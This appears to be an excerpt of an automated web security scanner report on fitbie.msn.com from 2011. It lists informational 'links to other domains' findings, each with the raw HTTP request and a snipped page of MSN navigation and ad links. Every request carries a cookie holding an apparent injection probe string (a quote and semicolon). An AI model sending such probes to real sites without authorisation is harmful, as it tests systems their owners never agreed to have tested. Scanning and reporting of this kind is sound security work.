Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:28:49 +0000
ETag: "1297607329-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=43052
Expires: Mon, 14 Feb 2011 02:28:50 GMT
Date: Sun, 13 Feb 2011 14:31:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99&cent; an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go &gt;</a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/slideshow/why-being-single-better-your-body?ocid=xnetr1-1" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
<p><a href="http://www.womenshealthmag.com/fitness/running-tips-beginners-guide?cm_mmc=Fit_Life-_-Original-_-Why%20being%20single%20is%20better%20for%20your%20body-_-101%20Greatest%20running%20tips%20for%20women" target="_blank">101 Greatest Running Tips for Women</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/slideshow/why-being-single-better-your-body?ocid=xnetr1-1">Digg</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/fitbie/getfit;kw=slideshow;slot=300x250.1;topic=women;sbtpc=whybeingsingleisbetterforyourbody;tile=1;sz=300x250;ord=123456?" target="_blank">
<img src="http://ad.doubleclick.net/ad/fitbie/getfit;topic=women;sbtpc=whybeingsingleisbetterforyourbody;tile=1;sz=300x250;ord=123456?" width="300" height="250" border="0" alt="" />
</a>
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<a href="http://fitbie.msn.com/100calories"><img src="http://images.rodale.com/fitbie/extra/2011/module/snacking-apple-th.jpg" alt="Simple Ways to Cut 100 Calories" border="0"/></a>
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.4. http://fitbie.msn.com/videos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /videos

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos?vid= HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:01 +0000
ETag: "1297607341-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42710
Expires: Mon, 14 Feb 2011 02:28:47 GMT
Date: Sun, 13 Feb 2011 14:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99&cent; an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go &gt;</a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

4.5. http://fitbie.msn.com/videos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fitbie.msn.com
Path:   /videos/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/?vid= HTTP/1.1
Host: fitbie.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; s_cc=true; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; fsbstat=1; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; _HOP=I=1&TS=1297606884; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:03 +0000
ETag: "1297607343-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=42696
Expires: Mon, 14 Feb 2011 02:28:44 GMT
Date: Sun, 13 Feb 2011 14:37:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<div><img src="http://msnportalfitlife.112.2O7.net/b/ss/msnportalfitlife/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3">
<a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MBEFIT">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div>
   <a target="_blank" href="http://www.400caloriefix.com/fl/?keycode=152106" tabindex="8" class="promo"><img src="http://images.rodale.com/dca/400Cal-navButton.gif" alt="" border="0" width="80" height="31" /></a>
...[SNIP]...
<div class="shop-fitlife"><a href="https://shop.fitbie.com" title="shop fitbie" target="_blank"><img src="/sites/all/themes/fitlife/images/shop_fitbie.gif" alt="shop fitbie" />
...[SNIP]...
<span><a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Get Prevention magazine for only 99&cent; an issue plus a FREE gift!</a>
...[SNIP]...
<div class="free-trial">
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad">Go &gt;</a>
<a href="https://secure.rodale.com/webapp/wcs/stores/servlet/OaeEntryPage?storeId=10057&mktOfferId=FIT46685&keycode=I19WA05P&cm_mmc=BeFit.com%20-_-Module-_-Homepage-_-Prevention%20Magazine" target="_blank" title="ad"><img src="/sites/all/themes/fitlife/images/small_ad_img.png" alt="ad" />
...[SNIP]...
<li class="img"><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title=""><img src="/sites/default/files/2015348_043341_pb_cvc_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
